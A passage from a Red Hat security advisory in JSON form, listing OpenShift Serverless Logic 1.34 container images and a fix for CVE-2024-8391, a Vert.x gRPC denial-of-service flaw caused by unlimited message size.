"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64"
},
"product_reference": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64"
},
"product_reference": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64"
},
"product_reference": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64"
},
"product_reference": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
},
"product_reference": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-8391",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2024-09-04T16:20:44.762419+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2309758"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gRPC server in Eclipse Vert.x, which does not limit the maximum length of the message payload. This may lead to excessive memory consumption in a server or a client, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.vertx:vertx-grpc-client: io.vertx:vertx-grpc-server: Vertx gRPC server does not limit the maximum message size",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-8391"
},
{
"category": "external",
"summary": "RHBZ#2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-8391",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8391"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8391"
},
{
"category": "external",
"summary": "https://github.com/eclipse-vertx/vertx-grpc/issues/113",
"url": "https://github.com/eclipse-vertx/vertx-grpc/issues/113"
},
{
"category": "external",
"summary": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31"
}
],
"release_date": "2024-09-04T16:15:09.253000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
